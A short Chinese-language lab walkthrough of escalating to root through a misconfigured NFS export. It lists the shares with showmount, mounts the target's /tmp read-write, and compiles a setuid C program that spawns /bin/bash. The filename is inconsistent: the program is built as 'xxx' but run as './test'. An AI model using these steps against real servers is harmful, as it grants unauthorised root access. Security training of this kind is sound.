使用 showmount 命令可以列出 NFS 服务器上当前共享的文件系统以及相关信息,如挂载点和客户端访问权限。这对于了解 NFS 服务器的配置和状态非常有用
showmount -e 目标ip
可以看到目标有3个可安装共享
在本机新建一个目录用来接收数据:
然后通过命令将目标文件挂载到使用的攻击机上。本次实验时看到目标主机的 /tmp是共享目录,因此可以尝试将它挂载到我们的机器上。:
mount -o rw 目标主机ip:/目标的共享目录 /tmp/testnfs
此时可以访问目标主机的文件共享目录
接下来在攻击机的目录下 使用 nano 写命令来获取shell:
main ()
{
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}然后编译这个文件,并且给予这个文件权限:
gcc xxx.c -o xxx -w
chmod +s xxx
通过./test 来运行代码getshell